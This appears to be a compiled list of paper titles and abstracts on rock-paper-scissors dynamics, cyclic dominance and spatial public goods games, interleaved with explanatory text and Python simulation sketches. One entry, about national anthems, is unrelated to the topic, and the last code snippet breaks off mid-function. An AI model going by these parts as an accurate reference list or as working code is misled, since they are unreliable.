--- paper_title: Evolutionary dynamics of group interactions on structured populations: A review paper_content: Interactions among living organisms, from bacteria colonies to human societies, are inherently more complex than interactions among particles and non-living matter. Group interactions are a particularly important and widespread class, representative of which is the public goods game. In addition, methods of statistical physics have proved valuable for studying pattern formation, equilibrium selection and self-organization in evolutionary games. 
Here, we review recent advances in the study of evolutionary dynamics of group interactions on top of structured populations, including lattices, complex networks and coevolutionary models. We also compare these results with those obtained on well-mixed populations. The review particularly highlights that the study of the dynamics of group interactions, like several other important equilibrium and non-equilibrium dynamical processes in biological, economical and social sciences, benefits from the synergy between statistical physics, network science and evolutionary game theory. --- paper_title: The rock–paper–scissors game and the evolution of alternative male strategies paper_content: MANY species exhibit colour polymorphisms associated with alternative male reproductive strategies, including territorial males and 'sneaker males' that behave and look like females1–3. The prevalence of multiple morphs is a challenge to evolutionary theory because a single strategy should prevail unless morphs have exactly equal fitness4,5 or a fitness advantage when rare6,7. We report here the application of an evolutionary stable strategy model to a three-morph mating system in the side-blotched lizard. Using parameter estimates from field data, the model predicted oscillations in morph frequency, and the frequencies of the three male morphs were found to oscillate over a six-year period in the field. The fitnesses of each morph relative to other morphs were non-transitive in that each morph could invade another morph when rare, but was itself invadable by another morph when common. Concordance between frequency-dependent selection and the among-year changes in morph fitnesses suggest that male interactions drive a dynamic 'rock–paper–scissors' game7. --- paper_title: Costs for switching partners reduce network dynamics but not cooperative behaviour paper_content: Social networks represent the structuring of interactions between group members. Above all, many interactions are profoundly cooperative in humans and other animals. In accordance with this natural observation, theoretical work demonstrates that certain network structures favour the evolution of cooperation. Yet, recent experimental evidence suggests that static networks do not enhance cooperative behaviour in humans. By contrast, dynamic networks do foster cooperation. However, costs associated with dynamism such as time or resource investments in finding and establishing new partnerships have been neglected so far. Here, we show that human participants are much less likely to break links when costs arise for building new links. Especially, when costs were high, the network was nearly static. Surprisingly, cooperation levels in Prisoner's Dilemma games were not affected by reduced dynamism in social networks. We conclude that the mere potential to quit collaborations is sufficient in humans to reach high levels of cooperative behaviour. Effects of self-structuring processes or assortment on the network played a minor role: participants simply adjusted their cooperative behaviour in response to the threats of losing a partner or of being expelled. --- paper_title: Complex Competitive Relationships Among Genotypes of Three Perennial Grasses: Implications for Species Coexistence paper_content: Competitive relationships were studied among genotypes of Agropyron repens, Poa pratensis, and Phleum pratense collected from a grassland community in southeastern Ontario. 
Field surveys revealed no significant correlations of abundance among the three species within randomly placed survey plots. The greater performance of target plants in removal plots versus control plots for all three species in a vegetation-removal experiment, however, suggests that each of these three species was suppressed by competitive interactions in the field. One clone (genotype) of each species was collected from each of 10 sites (7-cm2 neighborhoods) within the community. Each genotype was propagated vegetatively and grown in the greenhouse in monocultures and in pairwise mixtures with all other genotypes collected from the community. Differences in relative competitive ability among species or genotypes were measured as significant differences between the yield-suppression coefficients of the two components of a mixture. A s... --- paper_title: Competing associations in six-species predator-prey models paper_content: We study a set of six-species ecological models where each species has two predators and two prey. On a square lattice the time evolution is governed by iterated invasions between the neighbouring predator–prey pairs chosen at random and by a site exchange with a probability Xs between the neutral pairs. These models involve the possibility of spontaneous formation of different defensive alliances whose members protect each other from the external invaders. The Monte Carlo simulations show a surprisingly rich variety of the stable spatial distributions of species and subsequent phase transitions when tuning the control parameter Xs. These very simple models are able to demonstrate that the competition between these associations influences their composition. Sometimes the dominant association is developed via a domain growth. In other cases larger and larger invasion processes precede the prevalence of one of the stable associations. Under some conditions the survival of all the species can be maintained by the cyclic dominance occurring between these associations. --- paper_title: Local dispersal promotes biodiversity in a real-life game of rock–paper–scissors paper_content: One of the central aims of ecology is to identify mechanisms that maintain biodiversity. Numerous theoretical models have shown that competing species can coexist if ecological processes such as dispersal, movement, and interaction occur over small spatial scales. In particular, this may be the case for non-transitive communities, that is, those without strict competitive hierarchies. The classic non-transitive system involves a community of three competing species satisfying a relationship similar to the children's game rock-paper-scissors, where rock crushes scissors, scissors cuts paper, and paper covers rock. Such relationships have been demonstrated in several natural systems. Some models predict that local interaction and dispersal are sufficient to ensure coexistence of all three species in such a community, whereas diversity is lost when ecological processes occur over larger scales. Here, we test these predictions empirically using a non-transitive model community containing three populations of Escherichia coli. We find that diversity is rapidly lost in our experimental community when dispersal and interaction occur over relatively large spatial scales, whereas all populations coexist when ecological processes are localized. 
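Several of the lattice and microbial studies above (the six-species predator-prey lattice model and the in vitro E. coli rock-paper-scissors experiment) rest on the same computational core: cyclic invasion between randomly chosen partners on a grid. The sketch below is a minimal illustration of that kind of simulation, not code from any of the cited papers; the lattice size, number of sweeps, and the switch between local and well-mixed partner choice are arbitrary assumptions made here for demonstration.

```python
import numpy as np

rng = np.random.default_rng(0)

L = 100        # lattice side length (illustrative choice)
SWEEPS = 100   # number of Monte Carlo sweeps (illustrative choice)
NEIGH = [(1, 0), (-1, 0), (0, 1), (0, -1)]

# Species 0, 1 and 2 with cyclic dominance: 0 invades 1, 1 invades 2, 2 invades 0.
lattice = rng.integers(0, 3, size=(L, L))

def beats(a, b):
    """True if species a invades species b in the rock-paper-scissors cycle."""
    return (b - a) % 3 == 1

def sweep(grid, local=True):
    """One Monte Carlo sweep of L*L randomly chosen invasion attempts."""
    n = grid.shape[0]
    for _ in range(n * n):
        x, y = rng.integers(0, n, size=2)
        if local:
            dx, dy = NEIGH[rng.integers(4)]
            u, v = (x + dx) % n, (y + dy) % n    # nearest neighbour, periodic boundaries
        else:
            u, v = rng.integers(0, n, size=2)    # "well-mixed": partner drawn from anywhere
        a, b = grid[x, y], grid[u, v]
        if beats(a, b):
            grid[u, v] = a
        elif beats(b, a):
            grid[x, y] = b

for t in range(SWEEPS):
    sweep(lattice, local=True)   # set local=False to mimic the well-mixed limit
    if t % 20 == 0:
        densities = np.bincount(lattice.ravel(), minlength=3) / lattice.size
        print(f"sweep {t:4d}  densities = {densities.round(3)}")
```

With local partner choice the three species typically persist in a patchwork of domains, while in the well-mixed variant demographic fluctuations push the system towards the loss of all but one species on a timescale that grows with system size, in line with the local-dispersal argument of the experiment summarized above.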
--- paper_title: Volunteering leads to rock–paper–scissors dynamics in a public goods game paper_content: Collective efforts are a trademark of both insect and human societies1. They are achieved through relatedness in the former2 and unknown mechanisms in the latter. The problem of achieving cooperation among non-kin has been described as the ‘tragedy of the commons’, prophesying the inescapable collapse of many human enterprises3,4. In public goods experiments, initial cooperation usually drops quickly to almost zero5. It can be maintained by the opportunity to punish defectors6 or the need to maintain good reputation7. Both schemes require that defectors are identified. Theorists propose that a simple but effective mechanism operates under full anonymity. With optional participation in the public goods game, ‘loners’ (players who do not join the group), defectors and cooperators will coexist through rock–paper–scissors dynamics8,9. Here we show experimentally that volunteering generates these dynamics in public goods games and that manipulating initial conditions can produce each predicted direction. If, by manipulating displayed decisions, it is pretended that defectors have the highest frequency, loners soon become most frequent, as do cooperators after loners and defectors after cooperators. On average, cooperation is perpetuated at a substantial level. --- paper_title: Spatial organization in cyclic Lotka-Volterra systems paper_content: We study the evolution of a system of $N$ interacting species which mimics the dynamics of a cyclic food chain. On a one-dimensional lattice with N<5 species, spatial inhomogeneities develop spontaneously in initially homogeneous systems. The arising spatial patterns form a mosaic of single-species domains with algebraically growing size, $\ell(t)\sim t^\alpha$, where $\alpha=3/4$ (1/2) and 1/3 for N=3 with sequential (parallel) dynamics and N=4, respectively. The domain distribution also exhibits a self-similar spatial structure which is characterized by an additional length scale, ${\cal L}(t)\sim t^\beta$, with $\beta=1$ and 2/3 for N=3 and 4, respectively. For $N\geq 5$, the system quickly reaches a frozen state with non interacting neighboring species. We investigate the time distribution of the number of mutations of a site using scaling arguments as well as an exact solution for N=3. Some possible extensions of the system are analyzed. --- paper_title: Fixation in a cyclic Lotka-Volterra model paper_content: We study a cyclic Lotka-Volterra model of N interacting species populating a d-dimensional lattice. In the realm of a Kirkwood approximation, a critical number of species N_c(d) above which the system fixates is determined analytically. We find N_c=5,14,23 in dimensions d=1,2,3, in remarkably good agreement with simulation results in two dimensions. --- paper_title: Effects of punishment in a mobile population playing the prisoner's dilemma game paper_content: We deal with a system of prisoner's dilemma players undergoing continuous motion in a two-dimensional plane. In contrast to previous work, we introduce altruistic punishment after the game. We find punishing only a few of the cooperator-defector interactions is enough to lead the system to a cooperative state in environments where otherwise defection would take over the population. This happens even with soft nonsocial punishment (where both cooperators and defectors punish other players, a behavior observed in many human populations). 
For high enough mobilities or temptations to defect, low rates of social punishment can no longer avoid the breakdown of cooperation. --- paper_title: Dynamically generated cyclic dominance in spatial prisoner's dilemma games paper_content: We have studied the impact of time-dependent learning capacities of players in the framework of spatial prisoner's dilemma game. In our model, this capacity of players may decrease or increase in time after strategy adoption according to a step-like function. We investigated both possibilities separately and observed significantly different mechanisms that form the stationary pattern of the system. The time decreasing learning activity helps cooperator domains to recover the possible intrude of defectors hence supports cooperation. In the other case the temporary restrained learning activity generates a cyclic dominance between defector and cooperator strategies, which helps to maintain the diversity of strategies via propagating waves. The results are robust and remain valid by changing payoff values, interaction graphs or functions characterizing time-dependence of learning activity. Our observations suggest that dynamically generated mechanisms may offer alternative ways to keep cooperators alive even at very larger temptation to defect. --- paper_title: Testosterone, Endurance, and Darwinian Fitness: Natural and Sexual Selection on the Physiological Bases of Alternative Male Behaviors in Side-Blotched Lizards paper_content: The mechanistic bases of natural and sexual selection on physiological and behavioral traits were examined in male morphs of three colors of the side-blotched lizard, Uta stansburiana. Orange-throated males are aggressive and defend large territories with many females. Blue-throated males defend smaller territories with fewer females; however, blue-throated males assiduously mate guard females on their territory. Yellow-throated males do not defend a territory, but patrol a large home range. They obtain secretive copulations from females on the territories of dominant males. Males with bright orange throats had higher levels of plasma testosterone (T), endurance, activity, and home range size and concomitantly gained greater control over female home ranges than blue- or yellow-throated males. Experimentally elevating plasma T in yellow- and blue-throated males increased their endurance, activity, home range size, and control over female territories to levels that were seen in unmanipulated orange-throated males that had naturally high plasma T. However, the enhanced performance of orange-throated males is not without costs. Orange-throated males had low survival compared to the other morphs. Finally, some yellow-throated males transformed to a partial blue morphology late in the season and the endurance of these transforming yellow-throated males increased from early to late in the season. In addition, yellow-throated males that transformed to blue also had significantly higher plasma T late in the season compared to the plasma T earlier in the season. T appears to play an important role in the physiological changes that all three color morphs undergo during the process of maturation. In some yellow males, T plays an additional role in plastic changes in behavior and physiology late in the reproductive season. We discuss natural and sexual selection on physiological and behavioral traits that leads to the evolution of steroid regulation in the context of alternative male strategies. 
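The two spatial prisoner's dilemma entries above (mobile players with punishment, and time-dependent learning capacities) both build on the standard lattice game with imitation updating. As a reference point, here is a minimal sketch of that baseline only, with no mobility, punishment, or learning dynamics: agents on a square lattice play the weak prisoner's dilemma with their four neighbours and copy a random neighbour's strategy with a payoff-dependent (Fermi) probability. The temptation b and the noise K below are illustrative values, not those used in the cited papers.

```python
import numpy as np

rng = np.random.default_rng(1)

L = 50        # lattice size (illustrative)
b = 1.05      # temptation to defect in the weak prisoner's dilemma (illustrative)
K = 0.1       # noise of the Fermi imitation rule (illustrative)
SWEEPS = 50
NEIGH = [(1, 0), (-1, 0), (0, 1), (0, -1)]

strat = rng.integers(0, 2, size=(L, L))   # 1 = cooperator, 0 = defector

def payoff(s, x, y):
    """Payoff of site (x, y) summed over its four neighbours (weak PD: R=1, T=b, S=P=0)."""
    total = 0.0
    for dx, dy in NEIGH:
        other = s[(x + dx) % L, (y + dy) % L]
        if s[x, y] == 1 and other == 1:
            total += 1.0        # mutual cooperation
        elif s[x, y] == 0 and other == 1:
            total += b          # defector exploits a cooperating neighbour
    return total

for t in range(SWEEPS):
    for _ in range(L * L):
        x, y = rng.integers(0, L, size=2)
        dx, dy = NEIGH[rng.integers(4)]
        u, v = (x + dx) % L, (y + dy) % L
        px, py = payoff(strat, x, y), payoff(strat, u, v)
        # Fermi rule: copy the neighbour's strategy with a probability that grows
        # with the neighbour's payoff advantage.
        if rng.random() < 1.0 / (1.0 + np.exp((px - py) / K)):
            strat[x, y] = strat[u, v]
    if t % 10 == 0:
        print(f"sweep {t:3d}  cooperator fraction = {strat.mean():.3f}")
```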
--- paper_title: Reward and cooperation in the spatial public goods game paper_content: The promise of punishment and reward in promoting public cooperation is debatable. While punishment is traditionally considered more successful than reward, the fact that the cost of punishment frequently fails to offset gains from enhanced cooperation has led some to reconsider reward as the main catalyst behind collaborative efforts. Here we elaborate on the "stick versus carrot" dilemma by studying the evolution of cooperation in the spatial public goods game, where besides the traditional cooperators and defectors, rewarding cooperators supplement the array of possible strategies. The latter are willing to reward cooperative actions at a personal cost, thus effectively downgrading pure cooperators to second-order free-riders due to their unwillingness to bear these additional costs. Consequently, we find that defection remains viable, especially if the rewarding is costly. Rewards, however, can promote cooperation, especially if the synergetic effects of cooperation are low. Surprisingly, moderate rewards may promote cooperation better than high rewards, which is due to the spontaneous emergence of cyclic dominance between the three strategies. --- paper_title: Evolutionary establishment of moral and double moral standards through spatial interactions paper_content: Situations where individuals have to contribute to joint efforts or share scarce resources are ubiquitous. Yet, without proper mechanisms to ensure cooperation, the evolutionary pressure to maximize individual success tends to create a tragedy of the commons (such as over-fishing or the destruction of our environment). This contribution addresses a number of related puzzles of human behavior with an evolutionary game theoretical approach as it has been successfully used to explain the behavior of other biological species many times, from bacteria to vertebrates. Our agent-based model distinguishes individuals applying four different behavioral strategies: non-cooperative individuals ("defectors"), cooperative individuals abstaining from punishment efforts (called "cooperators" or "second-order free-riders"), cooperators who punish non-cooperative behavior ("moralists"), and defectors, who punish other defectors despite being non-cooperative themselves ("immoralists"). By considering spatial interactions with neighboring individuals, our model reveals several interesting effects: First, moralists can fully eliminate cooperators. This spreading of punishing behavior requires a segregation of behavioral strategies and solves the "second-order free-rider problem". Second, the system behavior changes its character significantly even after very long times ("who laughs last laughs best effect"). Third, the presence of a number of defectors can largely accelerate the victory of moralists over non-punishing cooperators. Fourth, in order to succeed, moralists may profit from immoralists in a way that appears like an "unholy collaboration". Our findings suggest that the consideration of punishment strategies allows one to understand the establishment and spreading of "moral behavior" by means of game-theoretical concepts. This demonstrates that quantitative biological modeling approaches are powerful even in domains that have been addressed with non-mathematical concepts so far. The complex dynamics of certain social behaviors become understandable as the result of an evolutionary competition between different behavioral strategies.
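Both entries above hinge on how payoffs are assembled within a single public goods group once punishing (or rewarding) strategies are added. The helper below spells out one common accounting scheme: contribution, multiplied common pool, and peer punishment of defectors. It is a generic illustration with made-up parameter values, not the exact payoff structure of either cited model.

```python
def public_goods_payoffs(strategies, r=3.5, cost=1.0, fine=1.0, gamma=0.5):
    """
    Payoffs in a single public goods group with peer punishment.

    strategies : list of 'C' (cooperator), 'D' (defector) or 'P' (punishing cooperator)
    r          : synergy factor multiplying the common pool
    cost       : contribution paid by cooperators and punishers
    fine       : fine imposed on each defector by each punisher
    gamma      : cost a punisher pays per punished defector
    All parameter values here are illustrative assumptions.
    """
    n = len(strategies)
    contributors = sum(s in ('C', 'P') for s in strategies)
    punishers = strategies.count('P')
    defectors = strategies.count('D')
    share = r * cost * contributors / n      # everyone receives an equal share of the multiplied pool
    payoffs = []
    for s in strategies:
        p = share
        if s in ('C', 'P'):
            p -= cost                        # contributors pay the cost of cooperation
        if s == 'D':
            p -= fine * punishers            # defectors are fined by every punisher in the group
        if s == 'P':
            p -= gamma * defectors           # punishers pay a cost for every defector they punish
        payoffs.append(round(p, 3))
    return payoffs

print(public_goods_payoffs(['C', 'C', 'P', 'D', 'D']))   # e.g. [1.1, 1.1, 0.1, 1.1, 1.1]
```

With these illustrative numbers the punishing cooperator earns less than both the plain cooperators and the defectors, which is exactly the second-order free-rider tension that the spatial models above resolve through clustering.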
--- paper_title: When does cyclic dominance lead to stable spiral waves? paper_content: Species diversity in ecosystems is often accompanied by the self-organisation of the population into fascinating spatio-temporal patterns. Here, we consider a two-dimensional three-species population model and study the spiralling patterns arising from the combined effects of generic cyclic dominance, mutation, pair-exchange and hopping of the individuals. The dynamics is characterised by nonlinear mobility and a Hopf bifurcation around which the system's phase diagram is inferred from the underlying complex Ginzburg-Landau equation derived using a perturbative multiscale expansion. While the dynamics is generally characterised by spiralling patterns, we show that spiral waves are stable in only one of the four phases. Furthermore, we characterise a phase where nonlinearity leads to the annihilation of spirals and to the spatially uniform dominance of each species in turn. Away from the Hopf bifurcation, when the coexistence fixed point is unstable, the spiralling patterns are also affected by nonlinear diffusion. --- paper_title: Cellular Automaton Models of Interspecific Competition for Space--The Effect of Pattern on Process paper_content: Species in plant communities generally show an aggregated distribution at one or more spatial scales. This, and the fact that competition between sessile organisms occurs chiefly between neighbours, suggests that the spatial configuration of plants should affect the process and outcome of interspecific competition. Cellular automaton models were constructed to simulate the competitive interaction of five grass species, Agrostis stolonifera, Holcus lanatus, Cynosurus cristatus, Poa trivialis and Lolium perenne, based on experimentally determined rates of invasion. A model with a random initial starting arrangement showed a very rapid loss of species compared to initial arrangements in which species occurred in monospecific bands (...) --- paper_title: Antibiotic-mediated antagonism leads to a bacterial game of rock–paper–scissors in vivo paper_content: Colicins are narrow-spectrum antibiotics produced by and active against Escherichia coli and its close relatives. Colicin-producing strains cannot coexist with sensitive or resistant strains in a well-mixed culture, yet all three phenotypes are recovered in natural populations1. Recent in vitro results conclude that strain diversity can be promoted by colicin production in a spatially structured, non-transitive interaction2, as in the classic non-transitive model rock–paper–scissors (RPS). In the colicin version of the RPS model, strains that produce colicins (C) kill sensitive (S) strains, which outcompete resistant (R) strains, which outcompete C strains. Pairwise in vitro competitions between these three strains are resolved in a predictable order (C beats S, S beats R, and R beats C), but the complete system of three strains presents the opportunity for dynamic equilibrium2. Here we provide conclusive evidence of an in vivo antagonistic role for colicins and show that colicins (and potentially other bacteriocins) may promote, rather than eliminate, microbial diversity in the environment. --- paper_title: Reward and punishment paper_content: Minigames capturing the essence of Public Goods experiments show that even in the absence of rationality assumptions, both punishment and reward will fail to bring about prosocial behavior.
This result holds in particular for the well-known Ultimatum Game, which emerges as a special case. But reputation can induce fairness and cooperation in populations adapting through learning or imitation. Indeed, the inclusion of reputation effects in the corresponding dynamical models leads to the evolution of economically productive behavior, with agents contributing to the public good and either punishing those who do not or rewarding those who do. Reward and punishment correspond to two types of bifurcation with intriguing complementarity. The analysis suggests that reputation is essential for fostering social behavior among selfish agents, and that it is considerably more effective with punishment than with reward. --- paper_title: Phase diagrams for the spatial public goods game with pool-punishment paper_content: The efficiency of institutionalized punishment is studied by evaluating the stationary states in the spatial public goods game comprising unconditional defectors, cooperators, and cooperating pool punishers as the three competing strategies. Fines and costs of pool punishment are considered as the two main parameters determining the stationary distributions of strategies on the square lattice. Each player collects a payoff from five five-person public goods games, and the evolution of strategies is subsequently governed by imitation based on pairwise comparisons at a low level of noise. The impact of pool punishment on the evolution of cooperation in structured populations is significantly different from that reported previously for peer punishment. Representative phase diagrams reveal remarkably rich behavior, depending also on the value of the synergy factor that characterizes the efficiency of investments payed into the common pool. Besides traditional single- and two-strategy stationary states, a rock-paper-scissors type of cyclic dominance can emerge in strikingly different ways. --- paper_title: Coevolutionary Dynamics: From Finite to Infinite Populations paper_content: Traditionally, frequency dependent evolutionary dynamics is described by deterministic replicator dynamics assuming implicitly infinite population sizes. Only recently have stochastic processes been introduced to study evolutionary dynamics in finite populations. However, the relationship between deterministic and stochastic approaches remained unclear. Here we solve this problem by explicitly considering large populations. In particular, we identify different microscopic stochastic processes that lead to the standard or the adjusted replicator dynamics. Moreover, differences on the individual level can lead to qualitatively different dynamics in asymmetric conflicts and, depending on the population size, can even invert the direction of the evolutionary process. --- paper_title: Cyclic dominance and biodiversity in well-mixed populations paper_content: Coevolutionary dynamics is investigated in chemical catalysis, biological evolution, social and economic systems. The dynamics of these systems can be analyzed within the unifying framework of evolutionary game theory. In this Letter, we show that even in well-mixed finite populations, where the dynamics is inherently stochastic, biodiversity is possible with three cyclic-dominant strategies. We show how the interplay of evolutionary dynamics, discreteness of the population, and the nature of the interactions influences the coexistence of strategies. We calculate a critical population size above which coexistence is likely. 
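The last entry above concerns cyclic dominance in finite, well-mixed populations, where demographic noise eventually destroys coexistence. A stripped-down way to probe this numerically is the urn-type simulation sketched below; the update rule (two random individuals meet and the cyclically dominant one converts the other) and the population sizes are illustrative assumptions, not the exact process analysed in the cited paper.

```python
import numpy as np

rng = np.random.default_rng(2)

def extinction_time(N, max_steps=2_000_000):
    """
    Well-mixed stochastic rock-paper-scissors: at every step two individuals are drawn at
    random and the cyclically dominant one converts the other.  Returns the time (in
    generations, i.e. elementary steps divided by N) until the first species dies out.
    The update rule and the population sizes are illustrative assumptions.
    """
    counts = np.array([N // 3, N // 3, N - 2 * (N // 3)])
    for step in range(max_steps):
        if np.any(counts == 0):
            return step / N
        p = counts / counts.sum()
        a = rng.choice(3, p=p)       # species of the first individual
        b = rng.choice(3, p=p)       # species of the second individual
        if (b - a) % 3 == 1:         # a beats b
            counts[a] += 1
            counts[b] -= 1
        elif (a - b) % 3 == 1:       # b beats a
            counts[b] += 1
            counts[a] -= 1
    return np.nan                    # no extinction within the step budget

for N in (30, 60, 120):
    times = [extinction_time(N) for _ in range(20)]
    print(f"N = {N:4d}   mean extinction time ≈ {np.nanmean(times):.1f} generations")
```

In repeated runs the measured extinction time grows with the population size, which is the finite-size effect behind the critical population size discussed in the entry above.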
--- paper_title: Interfaces with internal structures in generalized rock-paper-scissors models paper_content: In this work we investigate the development of stable dynamical structures along interfaces separating domains belonging to enemy partnerships, in the context of cyclic predator-prey models with an even number of species $N \ge 8$. We use both stochastic and field theory simulations in one and two spatial dimensions, as well as analytical arguments, to describe the association at the interfaces of mutually neutral individuals belonging to enemy partnerships and to probe their role in the development of the dynamical structures at the interfaces. We identify an interesting behaviour associated to the symmetric or asymmetric evolution of the interface profiles depending on whether $N/2$ is odd or even, respectively. We also show that the macroscopic evolution of the interface network is not very sensitive internal structure of the interfaces. Although this work focus on cyclic predator prey-models with an even number of species, we argue that the results are expected to be quite generic in the context of spatial stochastic May-Leonard models. --- paper_title: Coexistence versus extinction in the stochastic cyclic Lotka-Volterra model paper_content: Cyclic dominance of species has been identified as a potential mechanism to maintain biodiversity, see, e.g., B. Kerr, M. A. Riley, M. W. Feldman and B. J. M. Bohannan Nature 418, 171 (2002)] and B. Kirkup and M. A. Riley Nature 428, 412 (2004)]. Through analytical methods supported by numerical simulations, we address this issue by studying the properties of a paradigmatic non-spatial three-species stochastic system, namely, the "rock-paper-scissors" or cyclic Lotka-Volterra model. While the deterministic approach (rate equations) predicts the coexistence of the species resulting in regular (yet neutrally stable) oscillations of the population densities, we demonstrate that fluctuations arising in the system with a finite number of agents drastically alter this picture and are responsible for extinction: After long enough time, two of the three species die out. As main findings we provide analytic estimates and numerical computation of the extinction probability at a given time. We also discuss the implications of our results for a broad class of competing population systems. --- paper_title: Coaction versus reciprocity in continuous-time models of cooperation. paper_content: Cooperating animals frequently show closely coordinated behaviours organized by a continuous flow of information between interacting partners. Such real-time coaction is not captured by the iterated prisoner's dilemma and other discrete-time reciprocal cooperation games, which inherently feature a delay in information exchange. Here, we study the evolution of cooperation when individuals can dynamically respond to each other's actions. We develop continuous-time analogues of iterated-game models and describe their dynamics in terms of two variables, the propensity of individuals to initiate cooperation (altruism) and their tendency to mirror their partner's actions (coordination). These components of cooperation stabilize at an evolutionary equilibrium or show oscillations, depending on the chosen payoff parameters. Unlike reciprocal altruism, cooperation by coaction does not require that those willing to initiate cooperation pay in advance for uncertain future benefits. 
Correspondingly, we show that introducing a delay to information transfer between players is equivalent to increasing the cost of cooperation. Cooperative coaction can therefore evolve much more easily than reciprocal cooperation. When delays entirely prevent coordination, we recover results from the discrete-time alternating prisoner's dilemma, indicating that coaction and reciprocity are connected by a continuum of opportunities for real-time information exchange. --- paper_title: Nonlinear Aspects of Competition Between Three Species paper_content: It is shown that for three competitors, the classic Gause–Lotka–Volterra equations possess a special class of periodic limit cycle solutions, and a general class of solutions in which the system exhibits nonperiodic population oscillations of bounded amplitude but ever increasing cycle time. Biologically, the result is interesting as a caricature of the complexities that nonlinearities can introduce even into the simplest equations of population biology ; mathematically, the model illustrates some novel tactical tricks and dynamical peculiarities for 3-dimensional nonlinear systems. --- paper_title: Spatial Rock-Paper-Scissors Models with Inhomogeneous Reaction Rates paper_content: We study several variants of the stochastic four-state rock-paper-scissors game or, equivalently, cyclic three-species predator-prey models with conserved total particle density, by means of Monte Carlo simulations on one- and two-dimensional lattices. Specifically, we investigate the influence of spatial variability of the reaction rates and site occupancy restrictions on the transient oscillations of the species densities and on spatial correlation functions in the quasistationary coexistence state. For small systems, we also numerically determine the dependence of typical extinction times on the number of lattice sites. In stark contrast with two-species stochastic Lotka-Volterra systems, we find that for our three-species models with cyclic competition quenched disorder in the reaction rates has very little effect on the dynamics and the long-time properties of the coexistence state. Similarly, we observe that site restriction only has a minor influence on the system's dynamical properties. Our results therefore demonstrate that the features of the spatial rock-paper-scissors system are remarkably robust with respect to model variations, and stochastic fluctuations as well as spatial correlations play a comparatively minor role. --- paper_title: Evolutionary games on graphs paper_content: Game theory is one of the key paradigms behind many scientific disciplines from biology to behavioral sciences to economics. In its evolutionary form and especially when the interacting agents are linked in a specific social network the underlying solution concepts and methods are very similar to those applied in non-equilibrium statistical physics. This review gives a tutorial-type overview of the field for physicists. The first three sections introduce the necessary background in classical and evolutionary game theory from the basic definitions to the most important results. The fourth section surveys the topological complications implied by non-mean-field-type social network structures in general. The last three sections discuss in detail the dynamic behavior of three prominent classes of models: the Prisoner's Dilemma, the Rock-Scissors-Paper game, and Competing Associations. 
The major theme of the review is in what sense and how the graph structure of interactions can modify and enrich the picture of long term behavioral patterns emerging in evolutionary games. --- paper_title: Interaction strengths in food webs: issues and opportunities paper_content: Summary 1. Recent efforts to understand how the patterning of interaction strength affects both structure and dynamics in food webs have highlighted several obstacles to productive synthesis. Issues arise with respect to goals and driving questions, methods and approaches, and placing results in the context of broader ecological theory. 2. Much confusion stems from lack of clarity about whether the questions posed relate to community-level patterns or to species dynamics, and to what authors actually mean by the term ‘interaction strength’. Here, we describe the various ways in which this term has been applied and discuss the implications of loose terminology and definition for the development of this field. 3. Of particular concern is the clear gap between theoretical and empirical investigations of interaction strengths and food web dynamics. The ecological community urgently needs to explore new ways to estimate biologically reasonable model coefficients from empirical data, such as foraging rates, body size, metabolic rate, biomass distribution and other species traits. 4. Combining numerical and analytical modelling approaches should allow exploration of the conditions under which different interaction strengths metrics are interchangeable with regard to relative magnitude, system responses, and species identity. 5. Finally, the prime focus on predator-prey links in much of the research to date on interaction strengths in food webs has meant that the potential significance of nontrophic interactions, such as competition, facilitation and biotic disturbance, has been largely ignored by the food web community. Such interactions may be important dynamically and should be routinely included in future food web research programmes. --- paper_title: Handbook of Stochastic Methods: For Physics, Chemistry and the Natural Sciences paper_content: The Handbook of Stochastic Methods covers systematically and in simple language the foundations of Markov systems, stochastic differential equations, Fokker-Planck equations, approximation methods, chemical master equations, and quantum-mechanical Markov processes. Strong emphasis is placed on systematic approximation methods for solving problems. Stochastic adiabatic elimination is newly formulated. The book contains the "folklore" of stochastic methods in systematic form and is suitable for use as a reference work. --- paper_title: Meet the New Boss – Same as the Old Boss paper_content: A key paradox of subalternity for the subject throwing off the colonial yoke is the degree to which the collective emergence from the nation-state is to be in the image of the colonizer; that is, as a modern state, notionally on a par with the mother/father country. With a view to understanding the meaning of such symbolic investments, this paper surveys the lyrics of national anthems from a wide range of postcolonial countries.
On the basis of a range of observations of anthems and their circumstances, this paper dares to ask finally whether the singing of anthems makes for better worlds. --- paper_title: Oscillatory Dynamics in Rock-Paper-Scissors Games with Mutations paper_content: We study the oscillatory dynamics in the generic three-species rock-paper-scissors games with mutations. In the mean-field limit, different behaviors are found: (a) for high mutation rate, there is a stable interior fixed point with coexistence of all species; (b) for low mutation rates, there is a region of the parameter space characterized by a limit cycle resulting from a Hopf bifurcation; (c) in the absence of mutations, there is a region where heteroclinic cycles yield oscillations of large amplitude (not robust against noise). After a discussion on the main properties of the mean-field dynamics, we investigate the stochastic version of the model within an individual-based formulation. Demographic fluctuations are therefore naturally accounted for and their effects are studied using a diffusion theory complemented by numerical simulations. It is thus shown that persistent erratic oscillations (quasi-cycles) of large amplitude emerge from a noise-induced resonance phenomenon. We also analytically and numerically compute the average escape time necessary to reach a (quasi-)cycle on which the system oscillates at a given amplitude. --- paper_title: Evolutionary games on minimally structured populations paper_content: Population structure induced by both spatial embedding and more general networks of interaction, such as model social networks, has been shown to have a fundamental effect on the dynamics and outcome of evolutionary games. These effects have, however, proved to be sensitive to the details of the underlying topology and dynamics. Here we introduce a minimal population structure that is described by two distinct hierarchical levels of interaction, similar to the structured metapopulation concept of ecology and island models in population genetics. We believe this model is able to identify effects of spatial structure that do not depend on the details of the topology. While effects depending on such details clearly lie outside the scope of our approach, we expect that those we are able to reproduce should be generally applicable to a wide range of models. We derive the dynamics governing the evolution of a system starting from fundamental individual level stochastic processes through two successive mean-field approximations. In our model of population structure the topology of interactions is described by only two parameters: the effective population size at the local scale and the relative strength of local dynamics to global mixing. We demonstrate, for example, the existence of a continuous transition leading to the dominance of cooperation in populations with hierarchical levels of unstructured mixing as the benefit to cost ratio becomes smaller than the local population size. Applying our model of spatial structure to the repeated prisoner's dilemma we uncover a counterintuitive mechanism by which the constant influx of defectors sustains cooperation. Further exploring the phase space of the repeated prisoner's dilemma and also of the "rock-paper-scissors" game we find indications of rich structure and are able to reproduce several effects observed in other models with explicit spatial embedding, such as the maintenance of biodiversity and the emergence of global oscillations.
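The rock-paper-scissors-with-mutations entry above contrasts mean-field behaviour at high and low mutation rates. The snippet below integrates one simple mean-field variant, the zero-sum replicator equations with a symmetric mutation term; it is intended only as a qualitative illustration (in this particular form mutation turns the neutrally stable cycles into damped spirals towards the coexistence point), and it is not the more general parameterization in which the cited paper locates the Hopf bifurcation.

```python
import numpy as np

def rps_mutation_flow(x, mu):
    """
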